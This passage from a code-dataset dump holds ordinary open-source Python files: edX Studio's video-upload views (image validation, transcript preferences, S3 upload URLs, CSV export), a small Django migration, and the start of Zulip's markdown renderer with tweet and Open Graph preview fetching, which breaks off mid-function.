pacoqueen/odfpy
|
examples/ods-currency.py
|
Python
|
gpl-2.0
| 3,626
|
"""
Views related to the video upload feature
"""
import csv
import json
import logging
from contextlib import closing
from datetime import datetime, timedelta
from uuid import uuid4
import rfc6266
from boto import s3
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.contrib.staticfiles.storage import staticfiles_storage
from django.core.files.images import get_image_dimensions
from django.http import HttpResponse, HttpResponseNotFound
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_noop
from django.views.decorators.http import require_GET, require_http_methods, require_POST
from edxval.api import (
SortDirection,
VideoSortField,
create_or_update_transcript_preferences,
create_video,
get_3rd_party_transcription_plans,
get_transcript_credentials_state_for_org,
get_transcript_preferences,
get_videos_for_course,
remove_transcript_preferences,
remove_video_for_course,
update_video_image,
update_video_status,
get_available_transcript_languages
)
from opaque_keys.edx.keys import CourseKey
from xmodule.video_module.transcripts_utils import Transcript
from contentstore.models import VideoUploadConfig
from contentstore.utils import reverse_course_url
from edxmako.shortcuts import render_to_response
from openedx.core.djangoapps.video_config.models import VideoTranscriptEnabledFlag
from openedx.core.djangoapps.waffle_utils import WaffleSwitchNamespace
from util.json_request import JsonResponse, expect_json
from .course import get_course_and_check_access
__all__ = [
'videos_handler',
'video_encodings_download',
'video_images_handler',
'transcript_preferences_handler',
]
LOGGER = logging.getLogger(__name__)
# Waffle switches namespace for videos
WAFFLE_NAMESPACE = 'videos'
WAFFLE_SWITCHES = WaffleSwitchNamespace(name=WAFFLE_NAMESPACE)
# Waffle switch for enabling/disabling video image upload feature
VIDEO_IMAGE_UPLOAD_ENABLED = 'video_image_upload_enabled'
# Default expiration, in seconds, of one-time URLs used for uploading videos.
KEY_EXPIRATION_IN_SECONDS = 86400
VIDEO_SUPPORTED_FILE_FORMATS = {
'.mp4': 'video/mp4',
'.mov': 'video/quicktime',
}
VIDEO_UPLOAD_MAX_FILE_SIZE_GB = 5
# maximum time for video to remain in upload state
MAX_UPLOAD_HOURS = 24
class TranscriptProvider(object):
"""
Transcription Provider Enumeration
"""
CIELO24 = 'Cielo24'
THREE_PLAY_MEDIA = '3PlayMedia'
CUSTOM = 'Custom'
class StatusDisplayStrings(object):
"""
A class to map status strings as stored in VAL to display strings for the
video upload page
"""
# Translators: This is the status of an active video upload
_UPLOADING = ugettext_noop("Uploading")
# Translators: This is the status for a video that the servers are currently processing
_IN_PROGRESS = ugettext_noop("In Progress")
# Translators: This is the status for a video that the servers have successfully processed
_COMPLETE = ugettext_noop("Ready")
# Translators: This is the status for a video that is uploaded completely
_UPLOAD_COMPLETED = ugettext_noop("Uploaded")
# Translators: This is the status for a video that the servers have failed to process
_FAILED = ugettext_noop("Failed")
# Translators: This is the status for a video that is cancelled during upload by user
_CANCELLED = ugettext_noop("Cancelled")
# Translators: This is the status for a video which has failed
# due to being flagged as a duplicate by an external or internal CMS
_DUPLICATE = ugettext_noop("Failed Duplicate")
# Translators: This is the status for a video which has duplicate token for youtube
_YOUTUBE_DUPLICATE = ugettext_noop("YouTube Duplicate")
# Translators: This is the status for a video for which an invalid
# processing token was provided in the course settings
_INVALID_TOKEN = ugettext_noop("Invalid Token")
# Translators: This is the status for a video that was included in a course import
_IMPORTED = ugettext_noop("Imported")
# Translators: This is the status for a video that is in an unknown state
_UNKNOWN = ugettext_noop("Unknown")
# Translators: This is the status for a video that is having its transcription in progress on servers
_TRANSCRIPTION_IN_PROGRESS = ugettext_noop("Transcription in Progress")
# Translators: This is the status for a video whose transcription is complete
_TRANSCRIPT_READY = ugettext_noop("Transcript Ready")
_STATUS_MAP = {
"upload": _UPLOADING,
"ingest": _IN_PROGRESS,
"transcode_queue": _IN_PROGRESS,
"transcode_active": _IN_PROGRESS,
"file_delivered": _COMPLETE,
"file_complete": _COMPLETE,
"upload_completed": _UPLOAD_COMPLETED,
"file_corrupt": _FAILED,
"pipeline_error": _FAILED,
"upload_failed": _FAILED,
"s3_upload_failed": _FAILED,
"upload_cancelled": _CANCELLED,
"duplicate": _DUPLICATE,
"youtube_duplicate": _YOUTUBE_DUPLICATE,
"invalid_token": _INVALID_TOKEN,
"imported": _IMPORTED,
"transcription_in_progress": _TRANSCRIPTION_IN_PROGRESS,
"transcript_ready": _TRANSCRIPT_READY,
}
@staticmethod
def get(val_status):
"""Map a VAL status string to a localized display string"""
return _(StatusDisplayStrings._STATUS_MAP.get(val_status, StatusDisplayStrings._UNKNOWN)) # pylint: disable=translation-of-non-string
@expect_json
@login_required
@require_http_methods(("GET", "POST", "DELETE"))
def videos_handler(request, course_key_string, edx_video_id=None):
"""
The restful handler for video uploads.
GET
html: return an HTML page to display previous video uploads and allow
new ones
json: return json representing the videos that have been uploaded and
their statuses
POST
json: create a new video upload; the actual files should not be provided
to this endpoint but rather PUT to the respective upload_url values
contained in the response
DELETE
soft deletes a video for particular course
"""
course = _get_and_validate_course(course_key_string, request.user)
if not course:
return HttpResponseNotFound()
if request.method == "GET":
if "application/json" in request.META.get("HTTP_ACCEPT", ""):
return videos_index_json(course)
else:
return videos_index_html(course)
elif request.method == "DELETE":
remove_video_for_course(course_key_string, edx_video_id)
return JsonResponse()
else:
if is_status_update_request(request.json):
return send_video_status_update(request.json)
return videos_post(course, request)
def validate_video_image(image_file):
"""
Validates video image file.
Arguments:
image_file: The selected image file.
Returns:
error (String or None): If there is error returns error message otherwise None.
"""
error = None
if not all(hasattr(image_file, attr) for attr in ['name', 'content_type', 'size']):
error = _('The image must have name, content type, and size information.')
elif image_file.content_type not in settings.VIDEO_IMAGE_SUPPORTED_FILE_FORMATS.values():
error = _('This image file type is not supported. Supported file types are {supported_file_formats}.').format(
supported_file_formats=settings.VIDEO_IMAGE_SUPPORTED_FILE_FORMATS.keys()
)
elif image_file.size > settings.VIDEO_IMAGE_SETTINGS['VIDEO_IMAGE_MAX_BYTES']:
error = _('This image file must be smaller than {image_max_size}.').format(
image_max_size=settings.VIDEO_IMAGE_MAX_FILE_SIZE_MB
)
elif image_file.size < settings.VIDEO_IMAGE_SETTINGS['VIDEO_IMAGE_MIN_BYTES']:
error = _('This image file must be larger than {image_min_size}.').format(
image_min_size=settings.VIDEO_IMAGE_MIN_FILE_SIZE_KB
)
else:
try:
image_file_width, image_file_height = get_image_dimensions(image_file)
except TypeError:
return _('There is a problem with this image file. Try to upload a different file.')
if image_file_width is None or image_file_height is None:
return _('There is a problem with this image file. Try to upload a different file.')
image_file_aspect_ratio = abs(image_file_width / float(image_file_height) - settings.VIDEO_IMAGE_ASPECT_RATIO)
if image_file_width < settings.VIDEO_IMAGE_MIN_WIDTH or image_file_height < settings.VIDEO_IMAGE_MIN_HEIGHT:
error = _('Recommended image resolution is {image_file_max_width}x{image_file_max_height}. '
'The minimum resolution is {image_file_min_width}x{image_file_min_height}.').format(
image_file_max_width=settings.VIDEO_IMAGE_MAX_WIDTH,
image_file_max_height=settings.VIDEO_IMAGE_MAX_HEIGHT,
image_file_min_width=settings.VIDEO_IMAGE_MIN_WIDTH,
image_file_min_height=settings.VIDEO_IMAGE_MIN_HEIGHT
)
elif image_file_aspect_ratio > settings.VIDEO_IMAGE_ASPECT_RATIO_ERROR_MARGIN:
error = _('This image file must have an aspect ratio of {video_image_aspect_ratio_text}.').format(
video_image_aspect_ratio_text=settings.VIDEO_IMAGE_ASPECT_RATIO_TEXT
)
else:
try:
image_file.name.encode('ascii')
except UnicodeEncodeError:
error = _('The image file name can only contain letters, numbers, hyphens (-), and underscores (_).')
return error
@expect_json
@login_required
@require_POST
def video_images_handler(request, course_key_string, edx_video_id=None):
# respond with a 404 if image upload is not enabled.
if not WAFFLE_SWITCHES.is_enabled(VIDEO_IMAGE_UPLOAD_ENABLED):
return HttpResponseNotFound()
if 'file' not in request.FILES:
return JsonResponse({'error': _(u'An image file is required.')}, status=400)
image_file = request.FILES['file']
error = validate_video_image(image_file)
if error:
return JsonResponse({'error': error}, status=400)
with closing(image_file):
image_url = update_video_image(edx_video_id, course_key_string, image_file, image_file.name)
LOGGER.info(
'VIDEOS: Video image uploaded for edx_video_id [%s] in course [%s]', edx_video_id, course_key_string
)
return JsonResponse({'image_url': image_url})
def validate_transcript_preferences(provider, cielo24_fidelity, cielo24_turnaround,
three_play_turnaround, video_source_language, preferred_languages):
"""
Validate 3rd Party Transcription Preferences.
Arguments:
provider: Transcription provider
cielo24_fidelity: Cielo24 transcription fidelity.
cielo24_turnaround: Cielo24 transcription turnaround.
three_play_turnaround: 3PlayMedia transcription turnaround.
video_source_language: Source/Speech language of the videos that are going to be submitted to the Providers.
preferred_languages: list of language codes.
Returns:
validated preferences or a validation error.
"""
error, preferences = None, {}
# validate transcription providers
transcription_plans = get_3rd_party_transcription_plans()
if provider in transcription_plans.keys():
# Further validations for providers
if provider == TranscriptProvider.CIELO24:
# Validate transcription fidelity
if cielo24_fidelity in transcription_plans[provider]['fidelity']:
# Validate transcription turnaround
if cielo24_turnaround not in transcription_plans[provider]['turnaround']:
error = 'Invalid cielo24 turnaround {}.'.format(cielo24_turnaround)
return error, preferences
# Validate transcription languages
supported_languages = transcription_plans[provider]['fidelity'][cielo24_fidelity]['languages']
if video_source_language not in supported_languages:
error = 'Unsupported source language {}.'.format(video_source_language)
return error, preferences
if not len(preferred_languages) or not (set(preferred_languages) <= set(supported_languages.keys())):
error = 'Invalid languages {}.'.format(preferred_languages)
return error, preferences
# Validated Cielo24 preferences
preferences = {
'video_source_language': video_source_language,
'cielo24_fidelity': cielo24_fidelity,
'cielo24_turnaround': cielo24_turnaround,
'preferred_languages': preferred_languages,
}
else:
error = 'Invalid cielo24 fidelity {}.'.format(cielo24_fidelity)
elif provider == TranscriptProvider.THREE_PLAY_MEDIA:
# Validate transcription turnaround
if three_play_turnaround not in transcription_plans[provider]['turnaround']:
error = 'Invalid 3play turnaround {}.'.format(three_play_turnaround)
return error, preferences
# Validate transcription languages
valid_translations_map = transcription_plans[provider]['translations']
if video_source_language not in valid_translations_map.keys():
error = 'Unsupported source language {}.'.format(video_source_language)
return error, preferences
valid_target_languages = valid_translations_map[video_source_language]
if not len(preferred_languages) or not (set(preferred_languages) <= set(valid_target_languages)):
error = 'Invalid languages {}.'.format(preferred_languages)
return error, preferences
# Validated 3PlayMedia preferences
preferences = {
'three_play_turnaround': three_play_turnaround,
'video_source_language': video_source_language,
'preferred_languages': preferred_languages,
}
else:
error = 'Invalid provider {}.'.format(provider)
return error, preferences
@expect_json
@login_required
@require_http_methods(('POST', 'DELETE'))
def transcript_preferences_handler(request, course_key_string):
"""
JSON view handler to post the transcript preferences.
Arguments:
request: WSGI request object
course_key_string: string for course key
Returns: valid json response or 400 with error message
"""
course_key = CourseKey.from_string(course_key_string)
is_video_transcript_enabled = VideoTranscriptEnabledFlag.feature_enabled(course_key)
if not is_video_transcript_enabled:
return HttpResponseNotFound()
if request.method == 'POST':
data = request.json
provider = data.get('provider')
error, preferences = validate_transcript_preferences(
provider=provider,
cielo24_fidelity=data.get('cielo24_fidelity', ''),
cielo24_turnaround=data.get('cielo24_turnaround', ''),
three_play_turnaround=data.get('three_play_turnaround', ''),
video_source_language=data.get('video_source_language'),
preferred_languages=data.get('preferred_languages', [])
)
if error:
response = JsonResponse({'error': error}, status=400)
else:
preferences.update({'provider': provider})
transcript_preferences = create_or_update_transcript_preferences(course_key_string, **preferences)
response = JsonResponse({'transcript_preferences': transcript_preferences}, status=200)
return response
elif request.method == 'DELETE':
remove_transcript_preferences(course_key_string)
return JsonResponse()
@login_required
@require_GET
def video_encodings_download(request, course_key_string):
"""
Returns a CSV report containing the encoded video URLs for video uploads
in the following format:
Video ID,Name,Status,Profile1 URL,Profile2 URL
aaaaaaaa-aaaa-4aaa-aaaa-aaaaaaaaaaaa,video.mp4,Complete,http://example.com/prof1.mp4,http://example.com/prof2.mp4
"""
course = _get_and_validate_course(course_key_string, request.user)
if not course:
return HttpResponseNotFound()
def get_profile_header(profile):
"""Returns the column header string for the given profile's URLs"""
# Translators: This is the header for a CSV file column
# containing URLs for video encodings for the named profile
# (e.g. desktop, mobile high quality, mobile low quality)
return _("{profile_name} URL").format(profile_name=profile)
profile_whitelist = VideoUploadConfig.get_profile_whitelist()
videos = list(_get_videos(course))
name_col = _("Name")
duration_col = _("Duration")
added_col = _("Date Added")
video_id_col = _("Video ID")
status_col = _("Status")
profile_cols = [get_profile_header(profile) for profile in profile_whitelist]
def make_csv_dict(video):
"""
Makes a dictionary suitable for writing CSV output. This involves
extracting the required items from the original video dict and
converting all keys and values to UTF-8 encoded string objects,
because the CSV module doesn't play well with unicode objects.
"""
# Translators: This is listed as the duration for a video that has not
# yet reached the point in its processing by the servers where its
# duration is determined.
duration_val = str(video["duration"]) if video["duration"] > 0 else _("Pending")
ret = dict(
[
(name_col, video["client_video_id"]),
(duration_col, duration_val),
(added_col, video["created"].isoformat()),
(video_id_col, video["edx_video_id"]),
(status_col, video["status"]),
] +
[
(get_profile_header(encoded_video["profile"]), encoded_video["url"])
for encoded_video in video["encoded_videos"]
if encoded_video["profile"] in profile_whitelist
]
)
return {
key.encode("utf-8"): value.encode("utf-8")
for key, value in ret.items()
}
response = HttpResponse(content_type="text/csv")
# Translators: This is the suggested filename when downloading the URL
# listing for videos uploaded through Studio
filename = _("{course}_video_urls").format(course=course.id.course)
# See https://tools.ietf.org/html/rfc6266#appendix-D
response["Content-Disposition"] = rfc6266.build_header(
filename + ".csv",
filename_compat="video_urls.csv"
)
writer = csv.DictWriter(
response,
[
col_name.encode("utf-8")
for col_name
in [name_col, duration_col, added_col, video_id_col, status_col] + profile_cols
],
dialect=csv.excel
)
writer.writeheader()
for video in videos:
writer.writerow(make_csv_dict(video))
return response
def _get_and_validate_course(course_key_string, user):
"""
Given a course key, return the course if it exists, the given user has
access to it, and it is properly configured for video uploads
"""
course_key = CourseKey.from_string(course_key_string)
# For now, assume all studio users that have access to the course can upload videos.
# In the future, we plan to add a new org-level role for video uploaders.
course = get_course_and_check_access(course_key, user)
if (
settings.FEATURES["ENABLE_VIDEO_UPLOAD_PIPELINE"] and
getattr(settings, "VIDEO_UPLOAD_PIPELINE", None) and
course and
course.video_pipeline_configured
):
return course
else:
return None
def convert_video_status(video):
"""
Convert status of a video. Status can be converted to one of the following:
* FAILED if video is in `upload` state for more than 24 hours
* `YouTube Duplicate` if status is `invalid_token`
* user-friendly video status
"""
now = datetime.now(video['created'].tzinfo)
if video['status'] == 'upload' and (now - video['created']) > timedelta(hours=MAX_UPLOAD_HOURS):
new_status = 'upload_failed'
status = StatusDisplayStrings.get(new_status)
message = 'Video with id [%s] is still in upload after [%s] hours, setting status to [%s]' % (
video['edx_video_id'], MAX_UPLOAD_HOURS, new_status
)
send_video_status_update([
{
'edxVideoId': video['edx_video_id'],
'status': new_status,
'message': message
}
])
elif video['status'] == 'invalid_token':
status = StatusDisplayStrings.get('youtube_duplicate')
else:
status = StatusDisplayStrings.get(video['status'])
return status
def _get_videos(course):
"""
Retrieves the list of videos from VAL corresponding to this course.
"""
is_video_transcript_enabled = VideoTranscriptEnabledFlag.feature_enabled(course.id)
videos = list(get_videos_for_course(unicode(course.id), VideoSortField.created, SortDirection.desc))
# convert VAL's status to studio's Video Upload feature status.
for video in videos:
video["status"] = convert_video_status(video)
if is_video_transcript_enabled:
video['transcripts'] = get_available_transcript_languages([video['edx_video_id']])
return videos
def _get_default_video_image_url():
"""
Returns default video image url
"""
return staticfiles_storage.url(settings.VIDEO_IMAGE_DEFAULT_FILENAME)
def _get_index_videos(course):
"""
Returns the information about each video upload required for the video list
"""
course_id = unicode(course.id)
attrs = ['edx_video_id', 'client_video_id', 'created', 'duration', 'status', 'courses']
if VideoTranscriptEnabledFlag.feature_enabled(course.id):
attrs += ['transcripts']
def _get_values(video):
"""
Get data for predefined video attributes.
"""
values = {}
for attr in attrs:
if attr == 'courses':
course = filter(lambda c: course_id in c, video['courses'])
(__, values['course_video_image_url']), = course[0].items()
else:
values[attr] = video[attr]
return values
return [
_get_values(video) for video in _get_videos(course)
]
def get_all_transcript_languages():
"""
Returns all possible languages for transcript.
"""
third_party_transcription_languages = {}
transcription_plans = get_3rd_party_transcription_plans()
cielo_fidelity = transcription_plans[TranscriptProvider.CIELO24]['fidelity']
# Get third party transcription languages.
third_party_transcription_languages.update(transcription_plans[TranscriptProvider.THREE_PLAY_MEDIA]['languages'])
third_party_transcription_languages.update(cielo_fidelity['MECHANICAL']['languages'])
third_party_transcription_languages.update(cielo_fidelity['PREMIUM']['languages'])
third_party_transcription_languages.update(cielo_fidelity['PROFESSIONAL']['languages'])
all_languages_dict = dict(settings.ALL_LANGUAGES, **third_party_transcription_languages)
# Return combined system settings and 3rd party transcript languages.
all_languages = []
for key, value in sorted(all_languages_dict.iteritems(), key=lambda (k, v): v):
all_languages.append({
'language_code': key,
'language_text': value
})
return all_languages
def videos_index_html(course):
"""
Returns an HTML page to display previous video uploads and allow new ones
"""
is_video_transcript_enabled = VideoTranscriptEnabledFlag.feature_enabled(course.id)
context = {
'context_course': course,
'image_upload_url': reverse_course_url('video_images_handler', unicode(course.id)),
'video_handler_url': reverse_course_url('videos_handler', unicode(course.id)),
'encodings_download_url': reverse_course_url('video_encodings_download', unicode(course.id)),
'default_video_image_url': _get_default_video_image_url(),
'previous_uploads': _get_index_videos(course),
'concurrent_upload_limit': settings.VIDEO_UPLOAD_PIPELINE.get('CONCURRENT_UPLOAD_LIMIT', 0),
'video_supported_file_formats': VIDEO_SUPPORTED_FILE_FORMATS.keys(),
'video_upload_max_file_size': VIDEO_UPLOAD_MAX_FILE_SIZE_GB,
'video_image_settings': {
'video_image_upload_enabled': WAFFLE_SWITCHES.is_enabled(VIDEO_IMAGE_UPLOAD_ENABLED),
'max_size': settings.VIDEO_IMAGE_SETTINGS['VIDEO_IMAGE_MAX_BYTES'],
'min_size': settings.VIDEO_IMAGE_SETTINGS['VIDEO_IMAGE_MIN_BYTES'],
'max_width': settings.VIDEO_IMAGE_MAX_WIDTH,
'max_height': settings.VIDEO_IMAGE_MAX_HEIGHT,
'supported_file_formats': settings.VIDEO_IMAGE_SUPPORTED_FILE_FORMATS
},
'is_video_transcript_enabled': is_video_transcript_enabled,
'video_transcript_settings': None,
'active_transcript_preferences': None,
'transcript_credentials': None,
'transcript_available_languages': None
}
if is_video_transcript_enabled:
context['video_transcript_settings'] = {
'transcript_preferences_handler_url': reverse_course_url(
'transcript_preferences_handler',
unicode(course.id)
),
'transcript_credentials_handler_url': reverse_course_url(
'transcript_credentials_handler',
unicode(course.id)
),
'transcript_download_handler_url': reverse_course_url(
'transcript_download_handler',
unicode(course.id)
),
'transcript_upload_handler_url': reverse_course_url(
'transcript_upload_handler',
unicode(course.id)
),
'transcript_delete_handler_url': reverse_course_url(
'transcript_delete_handler',
unicode(course.id)
),
'transcription_plans': get_3rd_party_transcription_plans(),
'trancript_download_file_format': Transcript.SRT
}
context['active_transcript_preferences'] = get_transcript_preferences(unicode(course.id))
# Cached state for transcript providers' credentials (org-specific)
context['transcript_credentials'] = get_transcript_credentials_state_for_org(course.id.org)
context['transcript_available_languages'] = get_all_transcript_languages()
return render_to_response('videos_index.html', context)
def videos_index_json(course):
"""
Returns JSON in the following format:
{
'videos': [{
'edx_video_id': 'aaaaaaaa-aaaa-4aaa-aaaa-aaaaaaaaaaaa',
'client_video_id': 'video.mp4',
'created': '1970-01-01T00:00:00Z',
'duration': 42.5,
'status': 'upload',
'course_video_image_url': 'https://video/images/1234.jpg'
}]
}
"""
return JsonResponse({"videos": _get_index_videos(course)}, status=200)
def videos_post(course, request):
"""
Input (JSON):
{
"files": [{
"file_name": "video.mp4",
"content_type": "video/mp4"
}]
}
Returns (JSON):
{
"files": [{
"file_name": "video.mp4",
"upload_url": "http://example.com/put_video"
}]
}
The returned array corresponds exactly to the input array.
"""
error = None
data = request.json
if 'files' not in data:
error = "Request object is not JSON or does not contain 'files'"
elif any(
'file_name' not in file or 'content_type' not in file
for file in data['files']
):
error = "Request 'files' entry does not contain 'file_name' and 'content_type'"
elif any(
file['content_type'] not in VIDEO_SUPPORTED_FILE_FORMATS.values()
for file in data['files']
):
error = "Request 'files' entry contain unsupported content_type"
if error:
return JsonResponse({'error': error}, status=400)
bucket = storage_service_bucket()
req_files = data['files']
resp_files = []
for req_file in req_files:
file_name = req_file['file_name']
try:
file_name.encode('ascii')
except UnicodeEncodeError:
error_msg = 'The file name for %s must contain only ASCII characters.' % file_name
return JsonResponse({'error': error_msg}, status=400)
edx_video_id = unicode(uuid4())
key = storage_service_key(bucket, file_name=edx_video_id)
metadata_list = [
('client_video_id', file_name),
('course_key', unicode(course.id)),
]
# Only include `course_video_upload_token` if its set, as it won't be required if video uploads
# are enabled by default.
course_video_upload_token = course.video_upload_pipeline.get('course_video_upload_token')
if course_video_upload_token:
metadata_list.append(('course_video_upload_token', course_video_upload_token))
is_video_transcript_enabled = VideoTranscriptEnabledFlag.feature_enabled(course.id)
if is_video_transcript_enabled:
transcript_preferences = get_transcript_preferences(unicode(course.id))
if transcript_preferences is not None:
metadata_list.append(('transcript_preferences', json.dumps(transcript_preferences)))
for metadata_name, value in metadata_list:
key.set_metadata(metadata_name, value)
upload_url = key.generate_url(
KEY_EXPIRATION_IN_SECONDS,
'PUT',
headers={'Content-Type': req_file['content_type']}
)
# persist edx_video_id in VAL
create_video({
'edx_video_id': edx_video_id,
'status': 'upload',
'client_video_id': file_name,
'duration': 0,
'encoded_videos': [],
'courses': [unicode(course.id)]
})
resp_files.append({'file_name': file_name, 'upload_url': upload_url, 'edx_video_id': edx_video_id})
return JsonResponse({'files': resp_files}, status=200)
def storage_service_bucket():
"""
Returns an S3 bucket for video uploads.
"""
conn = s3.connection.S3Connection(
settings.AWS_ACCESS_KEY_ID,
settings.AWS_SECRET_ACCESS_KEY
)
# We don't need to validate our bucket, it requires a very permissive IAM permission
# set since behind the scenes it fires a HEAD request that is equivalent to get_all_keys()
# meaning it would need ListObjects on the whole bucket, not just the path used in each
# environment (since we share a single bucket for multiple deployments in some configurations)
return conn.get_bucket(settings.VIDEO_UPLOAD_PIPELINE["BUCKET"], validate=False)
def storage_service_key(bucket, file_name):
"""
Returns an S3 key to the given file in the given bucket.
"""
key_name = "{}/{}".format(
settings.VIDEO_UPLOAD_PIPELINE.get("ROOT_PATH", ""),
file_name
)
return s3.key.Key(bucket, key_name)
def send_video_status_update(updates):
"""
Update video status in edx-val.
"""
for update in updates:
update_video_status(update.get('edxVideoId'), update.get('status'))
LOGGER.info(
'VIDEOS: Video status update with id [%s], status [%s] and message [%s]',
update.get('edxVideoId'),
update.get('status'),
update.get('message')
)
return JsonResponse()
def is_status_update_request(request_data):
"""
Returns True if `request_data` contains status update else False.
"""
return any('status' in update for update in request_data)
|
hastexo/edx-platform
|
cms/djangoapps/contentstore/views/videos.py
|
Python
|
agpl-3.0
| 32,559
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-10-26 20:17
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('document', '0049_document_types'),
]
operations = [
migrations.RemoveField(
model_name='dossier',
name='is_active',
),
]
|
openkamer/openkamer
|
document/migrations/0050_remove_dossier_is_active.py
|
Python
|
mit
| 394
|
from __future__ import absolute_import
# Zulip's main markdown implementation. See docs/markdown.md for
# detailed documentation on our markdown syntax.
from typing import Any, Callable, Dict, Iterable, List, Optional, Tuple, TypeVar, Union, Text
from typing.re import Match
import markdown
import logging
import traceback
from six.moves import urllib
import re
import os.path
import glob
import twitter
import platform
import time
import httplib2
import itertools
from six.moves import urllib
import xml.etree.cElementTree as etree
from xml.etree.cElementTree import Element, SubElement
from collections import defaultdict
import requests
from django.core import mail
from django.conf import settings
from zerver.lib.avatar_hash import gravatar_hash
from markdown.extensions import codehilite
from zerver.lib.bugdown import fenced_code
from zerver.lib.bugdown.fenced_code import FENCE_RE
from zerver.lib.camo import get_camo_url
from zerver.lib.timeout import timeout, TimeoutExpired
from zerver.lib.cache import cache_with_key, cache_get_many, cache_set_many
from zerver.models import Message
import zerver.lib.alert_words as alert_words
import zerver.lib.mention as mention
from zerver.lib.str_utils import force_text, force_str
import six
from six.moves import range, html_parser
from six import text_type
if six.PY3:
import html
# Format version of the bugdown rendering; stored along with rendered
# messages so that we can efficiently determine what needs to be re-rendered
version = 1
_T = TypeVar('_T')
# We need to avoid this running at runtime, but mypy will see this.
# The problem is that under python 2, Element isn't exactly a type,
# which means that at runtime Union causes this to blow up.
if False:
# mypy requires the Optional to be inside Union
ElementStringNone = Union[Element, Optional[text_type]]
class BugdownRenderingException(Exception):
pass
def unescape(s):
# type: (Text) -> (Text)
if six.PY2:
return html_parser.HTMLParser().unescape(s)
else:
return html.unescape(s)
def list_of_tlds():
# type: () -> List[Text]
# HACK we manually blacklist .py
blacklist = [u'PY\n', ]
# tlds-alpha-by-domain.txt comes from http://data.iana.org/TLD/tlds-alpha-by-domain.txt
tlds_file = os.path.join(os.path.dirname(__file__), 'tlds-alpha-by-domain.txt')
tlds = [force_text(tld).lower().strip() for tld in open(tlds_file, 'r')
if tld not in blacklist and not tld[0].startswith('#')]
tlds.sort(key=len, reverse=True)
return tlds
def walk_tree(root, processor, stop_after_first=False):
# type: (Element, Callable[[Element], Optional[_T]], bool) -> List[_T]
results = []
stack = [root]
while stack:
currElement = stack.pop()
for child in currElement.getchildren():
if child.getchildren():
stack.append(child)
result = processor(child)
if result is not None:
results.append(result)
if stop_after_first:
return results
return results
# height is not actually used
def add_a(root, url, link, height="", title=None, desc=None,
class_attr="message_inline_image", data_id=None):
# type: (Element, Text, Text, Text, Optional[Text], Optional[Text], Text, Optional[Text]) -> None
title = title if title is not None else url_filename(link)
title = title if title else ""
desc = desc if desc is not None else ""
div = markdown.util.etree.SubElement(root, "div")
div.set("class", class_attr)
a = markdown.util.etree.SubElement(div, "a")
a.set("href", link)
a.set("target", "_blank")
a.set("title", title)
if data_id is not None:
a.set("data-id", data_id)
img = markdown.util.etree.SubElement(a, "img")
img.set("src", url)
if class_attr == "message_inline_ref":
summary_div = markdown.util.etree.SubElement(div, "div")
title_div = markdown.util.etree.SubElement(summary_div, "div")
title_div.set("class", "message_inline_image_title")
title_div.text = title
desc_div = markdown.util.etree.SubElement(summary_div, "desc")
desc_div.set("class", "message_inline_image_desc")
@cache_with_key(lambda tweet_id: tweet_id, cache_name="database", with_statsd_key="tweet_data")
def fetch_tweet_data(tweet_id):
# type: (Text) -> Optional[Dict[Text, Any]]
if settings.TEST_SUITE:
from . import testing_mocks
res = testing_mocks.twitter(tweet_id)
else:
creds = {
'consumer_key': settings.TWITTER_CONSUMER_KEY,
'consumer_secret': settings.TWITTER_CONSUMER_SECRET,
'access_token_key': settings.TWITTER_ACCESS_TOKEN_KEY,
'access_token_secret': settings.TWITTER_ACCESS_TOKEN_SECRET,
}
if not all(creds.values()):
return None
try:
api = twitter.Api(**creds)
# Sometimes Twitter hangs on responses. Timing out here
# will cause the Tweet to go through as-is with no inline
# preview, rather than having the message be rejected
# entirely. This timeout needs to be less than our overall
# formatting timeout.
tweet = timeout(3, api.GetStatus, tweet_id)
res = tweet.AsDict()
except AttributeError:
logging.error('Unable to load twitter api, you may have the wrong '
'library installed, see https://github.com/zulip/zulip/issues/86')
return None
except TimeoutExpired as e:
# We'd like to try again later and not cache the bad result,
# so we need to re-raise the exception (just as though
# we were being rate-limited)
raise
except twitter.TwitterError as e:
t = e.args[0]
if len(t) == 1 and ('code' in t[0]) and (t[0]['code'] == 34):
# Code 34 means that the message doesn't exist; return
# None so that we will cache the error
return None
elif len(t) == 1 and ('code' in t[0]) and (t[0]['code'] == 88 or
t[0]['code'] == 130):
# Code 88 means that we were rate-limited and 130
# means Twitter is having capacity issues; either way
# just raise the error so we don't cache None and will
# try again later.
raise
else:
# It's not clear what to do in cases of other errors,
# but for now it seems reasonable to log at error
# level (so that we get notified), but then cache the
# failure to proceed with our usual work
logging.error(traceback.format_exc())
return None
return res
HEAD_START_RE = re.compile(u'^head[ >]')
HEAD_END_RE = re.compile(u'^/head[ >]')
META_START_RE = re.compile(u'^meta[ >]')
META_END_RE = re.compile(u'^/meta[ >]')
def fetch_open_graph_image(url):
# type: (Text) -> Optional[Dict[str, Any]]
in_head = False
# HTML will auto close meta tags, when we start the next tag add a closing tag if it has not been closed yet.
last_closed = True
head = []
# TODO: What if response content is huge? Should we get headers first?
try:
content = requests.get(url, timeout=1).text
except:
return None
# Extract the head and meta tags
# All meta tags are self closing, have no children or are closed
# automatically.
for part in content.split('<'):
if not in_head and HEAD_START_RE.match(part):
# Started the head node output it to have a document root
in_head = True
head.append('<head>')
elif in_head and HEAD_END_RE.match(part):
# Found the end of the head close any remaining tag then stop
# processing
in_head = False
if not last_closed:
last_closed = True
head.append('</meta>')
head.append('</head>')
break
elif in_head and META_START_RE.match(part):
# Found a meta node copy it
if not last_closed:
head.append('</meta>')
last_closed = True
head.append('<')
head.append(part)
if '/>' not in part:
last_closed = False
elif in_head and META_END_RE.match(part):
# End of a meta node just copy it to close the tag
head.append('<')
head.append(part)
last_closed = True
try:
doc = etree.fromstring(''.join(head))
except etree.ParseError:
return None
og_image = doc.find('meta[@property="og:image"]')
og_title = doc.find('meta[@property="og:title"]')
og_desc = doc.find('meta[@property="og:description"]')
title = None
desc = None
if og_image is not None:
image = og_image.get('content')
else:
return None
if og_title is not None:
title = og_title.get('content')
if og_desc is not None:
desc = og_desc.get('content')
return {'image': image, 'title': title, 'desc': desc}
def get_tweet_id(url):
# type: (Text) -> Optional[Text]
parsed_url = urllib.parse.urlparse(url)
if not (parsed_url.netloc == 'twitter.com' or parsed_url.netloc.endswith('.twitter.com')):
return None
to_match = parsed_url.path
# In old-style twitter.com/#!/wdaher/status/1231241234-style URLs, we need to look at the fragment instead
